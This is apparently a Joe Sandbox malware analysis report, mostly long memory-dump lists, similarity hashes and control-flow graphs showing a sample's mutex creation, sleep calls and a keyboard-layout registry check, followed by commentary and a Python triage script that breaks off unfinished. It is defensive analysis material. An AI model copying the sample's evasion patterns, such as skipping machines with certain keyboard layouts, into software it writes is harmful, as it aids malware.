                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: ConditionVariableWake
• String ID: c13L$c13L
• API String ID: 1192502693-2565585393
• Opcode ID: fa7f3028c1e82d47d059cea7fd2ce62c5d7b5e4d900a28deba2f0d74c3292867
• Instruction ID: e51fbb17950c3c47a19aafc3ccecce8f0556cafd726c2f332562baccfa588892
• Opcode Fuzzy Hash: fa7f3028c1e82d47d059cea7fd2ce62c5d7b5e4d900a28deba2f0d74c3292867
• Instruction Fuzzy Hash: EF728C70A201449BEB18EF38DC89B9D7B79EF45304F60825DF809973C1DB359AA4CB91
APIs
• ExitProcess.KERNEL32(?,?,0029652A,?,?,?,?,?,00297661), ref: 00296567
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: ab4c115c4c5974fe047cd52329329b523f1b52759f60ef8f4b44a7700e12ad79
• Instruction ID: 8948370e3fc678671ebb32d211cd622f3a8b7969322c62379b5c0a604fef2469
• Opcode Fuzzy Hash: ab4c115c4c5974fe047cd52329329b523f1b52759f60ef8f4b44a7700e12ad79
• Instruction Fuzzy Hash: 62E0C231021248AFDF257F18C90DD4C3BA9FF1274DF424805FD084A222CB35EEA2CA80
Memory Dump Source
• Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dde03f062f5a13f741b3e0d108ed2df6885d7cfcc9a1ae7e8c35c2b61061fbf7
• Instruction ID: 8eb848afc8bb67f3c60691e1b03cc8691e64ad57d320e372668e0082365fc8ea
• Opcode Fuzzy Hash: dde03f062f5a13f741b3e0d108ed2df6885d7cfcc9a1ae7e8c35c2b61061fbf7
• Instruction Fuzzy Hash: 5121ACFB28C614FD618685C22B60AB63A7EE2D2730331C42EF447D5102F2955A4A7AB2

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 169 265c10-265cf7 call 265940 call 2659e0 call 264b30 178 265d21-265d3c call 27cff1 169->178 179 265cf9-265d05 169->179 180 265d17-265d1e call 27d663 179->180 181 265d07-265d15 179->181 180->178 181->180 183 265d42-265e23 call 296c6a call 2940f0 RegOpenKeyExA RegCloseKey 181->183 193 265e26-265e2b 183->193 193->193 194 265e2d-265e86 call 2780c0 193->194 198 265eb0-265ecc call 27cff1 194->198 199 265e88-265e94 194->199 200 265ea6-265ead call 27d663 199->200 201 265e96-265ea4 199->201 200->198 201->200 203 265ecd-265fde call 296c6a 201->203 214 265fe0-265fec 203->214 215 266008-266015 call 27cff1 203->215 216 265ffe-266005 call 27d663 214->216 217 265fee-265ffc 214->217 216->215 217->216 219 266016-26658e call 296c6a call 27e150 call 2780c0 * 5 217->219 243 266590-26659f 219->243 244 2665bb-2665d6 call 27cff1 219->244 245 2665b1-2665b8 call 27d663 243->245 246 2665a1-2665af 243->246 245->244 246->245 248 2665d7-2666b8 call 296c6a call 277a00 call 265c10 246->248 264 2666bc-2666db call 2622c0 248->264 265 2666ba 248->265 268 26670c-266712 264->268 269 2666dd-2666ec 264->269 265->264 272 266715-26671a 268->272 270 266702-266709 call 27d663 269->270 271 2666ee-2666fc 269->271 270->268 271->270 273 266937 call 296c6a 271->273 272->272 275 26671c-266744 call 277a00 call 265c10 272->275 279 26693c call 296c6a 273->279 285 266746 275->285 286 266748-266769 call 2622c0 275->286 283 266941-266d6f call 296c6a call 278200 call 296c6a 279->283 285->286 293 26679a-2667ae 286->293 294 26676b-26677a 286->294 303 2667b4-2667ba 293->303 304 266858-26687c 293->304 296 266790-266797 call 27d663 294->296 297 26677c-26678a 294->297 296->293 297->279 297->296 307 2667c0-2667ed call 277a00 call 265c10 303->307 305 266880-266885 304->305 305->305 308 266887-2668ec call 2780c0 * 2 305->308 321 2667f1-266818 call 2622c0 307->321 322 2667ef 307->322 319 2668ee-2668fd 308->319 320 266919-266936 call 27cff1 308->320 323 26690f-266916 call 27d663 319->323 324 2668ff-26690d 319->324 331 26681a-266829 321->331 332 266849-26684c 321->332 322->321 323->320 324->283 324->323 333 26683f-266846 call 27d663 331->333 334 26682b-266839 331->334 332->307 335 266852 332->335 333->332 334->273 334->333 335->304
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$c13L$c13L$c13L
• API String ID: 0-1534921301
• Opcode ID: 9233f746144cb4300dfa00e83fd64cf8093ad35beeae3b7558d84c8605c60676
• Instruction ID: 741cf8de22bdde8572d24dc1513c401dc93d1f83e066e93a7af142836b8f0b33
• Opcode Fuzzy Hash: 9233f746144cb4300dfa00e83fd64cf8093ad35beeae3b7558d84c8605c60676
• Instruction Fuzzy Hash: 6FF1F170910258ABEF24DF64CC85BDEBBB9EF45304F5042A9F509A7281DB749AE4CF90

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 898 269ba5-269d91 call 277a00 call 265c10 call 268b30 call 278220
APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2,
• API String ID: 1464230837-1264347116

Control-flow Graph
• Graph for the function starting at 269f44 (rendered graph omitted): basic blocks 269f44 through 26a9a8, with internal calls to 27d663, 2780c0 and 296c6a, and the imported API calls Sleep and CreateMutexA in block 26a953-26a994.
APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2,
• API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 746d33873397d4c754e8a4bd00889ac751dfb530f81ab8868a08695c41ac5a47
                                                                                                                                                                                                                                          • Instruction ID: d6bc2255b7019ed5796ff02c560b3f5877c459d79e2f8a377e42605c71a7ad58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 746d33873397d4c754e8a4bd00889ac751dfb530f81ab8868a08695c41ac5a47
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C3168316241008BEF18DB78DDC8BADB77AEF85310F348619E418E72D5CB7699E08B52

Control-flow Graph (function entry 26a079; the rendered graph and its executed/not-executed colouring did not survive extraction, so the basic blocks are listed as node id: address range, direct calls and resolved APIs, -> successor nodes)
• 954: 26a079-26a099 -> 958, 959
• 958: 26a0c7-26a0e3 -> 962, 963
• 959: 26a09b-26a0a7 -> 960, 961
• 960: 26a0bd-26a0c4, call 27d663 -> 958
• 961: 26a0a9-26a0b7 -> 960, 966
• 962: 26a0e5-26a0f1 -> 968, 969
• 963: 26a111-26a130 -> 964, 965
• 964: 26a132-26a13e -> 971, 972
• 965: 26a15e-26a916, call 2780c0
• 966: 26a930-26a994, call 296c6a, Sleep, CreateMutexA -> 984, 985
• 968: 26a107-26a10e, call 27d663 -> 963
• 969: 26a0f3-26a101 -> 966, 968
• 971: 26a154-26a15b, call 27d663 -> 965
• 972: 26a140-26a14e -> 966, 971
• 984: 26a996-26a998 -> 985, 986
• 985: 26a9a7-26a9a8
• 986: 26a99a-26a9a5 -> 985
APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2,
• API String ID: 1464230837-1264347116
• Opcode ID: 0ec9a675c2b5878c7e45d3f6e675906c408ee525966496e03dc84d005956d705
• Instruction ID: 820359fe30f371d980afea603f4c609671d1534a0a8fd548acfcd8296d7d5ef6
• Opcode Fuzzy Hash: 0ec9a675c2b5878c7e45d3f6e675906c408ee525966496e03dc84d005956d705
• Instruction Fuzzy Hash: 933146316242009BEF08DB78DEC9B6DB776EF82314F248619E418B73D5C77699E08E52

Control-flow Graph (function entry 26a1ae; the rendered graph and its executed/not-executed colouring did not survive extraction, so the basic blocks are listed as node id: address range, direct calls and resolved APIs, -> successor nodes)
• 988: 26a1ae-26a1ce -> 992, 993
• 992: 26a1d0-26a1dc -> 994, 995
• 993: 26a1fc-26a218 -> 996, 997
• 994: 26a1f2-26a1f9, call 27d663 -> 993
• 995: 26a1de-26a1ec -> 994, 998
• 996: 26a246-26a265 -> 1002, 1003
• 997: 26a21a-26a226 -> 1000, 1001
• 998: 26a935 -> 1008, 1009
• 1000: 26a23c-26a243, call 27d663 -> 996
• 1001: 26a228-26a236 -> 998, 1000
• 1002: 26a267-26a273 -> 1004, 1005
• 1003: 26a293-26a916, call 2780c0
• 1004: 26a275-26a283 -> 998, 1005
• 1005: 26a289-26a290, call 27d663 -> 1003
• 1008: 26a953-26a994, Sleep, CreateMutexA -> 1017, 1018
• 1009: 26a935, call 296c6a -> 1008
• 1017: 26a996-26a998 -> 1018, 1020
• 1018: 26a9a7-26a9a8
• 1020: 26a99a-26a9a5 -> 1018
APIs
• Sleep.KERNEL32(00000064), ref: 0026A963
• CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
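Two things about these two records are easy to miss when reading the report by hand. First, the function at 26a079 and the one at 26a1ae are not two mutex checks: their APIs sections cite the same instruction addresses (Sleep at 0026A963, CreateMutexA at 0026A981), and both control-flow graphs converge on the same tail blocks at 26a935-26a9a8, so the early-exit branches of both entries fall into one shared Sleep-then-CreateMutexA block. Second, the "String ID: T2," under Similarity is not a mutex name: 0x002C3254, the lpName argument of CreateMutexA, is 54 32 2C 00 in little-endian byte order, which reads as "T2," followed by a NUL. The actual name has to be taken from the dump at that address (the 002C2000 region listed under Memory Dump Source). The following script is an added triage example, not Joe Sandbox code; it parses the APIs lines and the flattened control_flow_graph text exactly as they appear in these two records (copied in as constructed input) and makes both observations mechanically. Function and field names such as triage, block_for and name_arg_as_bytes are this example's own, and the lpName position table only covers CreateMutexA.

```python
"""Triage two Joe Sandbox function records (added example; not Joe Sandbox code).

Parses the 'APIs' lines and the flattened 'control_flow_graph' token stream,
then reports which call sites the records share, which basic block each call
sits in and which blocks branch into it, and what a pointer argument looks
like when its own bytes are read as a string (the 'String ID' artifact).
"""
import re
import struct

# Constructed input: the APIs lines and CFG text of the records at 26a079 and 26a1ae.
RECORD_A = (
    "Sleep.KERNEL32(00000064), ref: 0026A963\n"
    "CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981\n",
    "control_flow_graph 954 26a079-26a099 958 26a0c7-26a0e3 954->958 959 26a09b-26a0a7 954->959 962 26a0e5-26a0f1 958->962 "
    "963 26a111-26a130 958->963 960 26a0bd-26a0c4 call 27d663 959->960 961 26a0a9-26a0b7 959->961 960->958 961->960 "
    "966 26a930-26a994 call 296c6a Sleep CreateMutexA 961->966 968 26a107-26a10e call 27d663 962->968 969 26a0f3-26a101 962->969 "
    "964 26a132-26a13e 963->964 965 26a15e-26a916 call 2780c0 963->965 971 26a154-26a15b call 27d663 964->971 972 26a140-26a14e 964->972 "
    "984 26a996-26a998 966->984 985 26a9a7-26a9a8 966->985 968->963 969->966 969->968 971->965 972->966 972->971 984->985 986 26a99a-26a9a5 984->986 986->985",
)
RECORD_B = (
    "Sleep.KERNEL32(00000064), ref: 0026A963\n"
    "CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981\n",
    "control_flow_graph 988 26a1ae-26a1ce 992 26a1d0-26a1dc 988->992 993 26a1fc-26a218 988->993 994 26a1f2-26a1f9 call 27d663 992->994 "
    "995 26a1de-26a1ec 992->995 996 26a246-26a265 993->996 997 26a21a-26a226 993->997 994->993 995->994 998 26a935 995->998 "
    "1002 26a267-26a273 996->1002 1003 26a293-26a916 call 2780c0 996->1003 1000 26a23c-26a243 call 27d663 997->1000 1001 26a228-26a236 997->1001 "
    "1000->996 1001->998 1001->1000 1004 26a275-26a283 1002->1004 1005 26a289-26a290 call 27d663 1002->1005 1004->998 1004->1005 1005->1003 "
    "1008 26a953-26a994 Sleep CreateMutexA 998->1008 1009 26a935 call 296c6a 998->1009 1017 26a996-26a998 1008->1017 1018 26a9a7-26a9a8 1008->1018 "
    "1009->1008 1017->1018 1020 26a99a-26a9a5 1017->1020 1020->1018",
)

API_LINE = re.compile(r"(\w+)\.(\w+)\(([0-9A-Fa-f,]*)\), ref: ([0-9A-Fa-f]+)")
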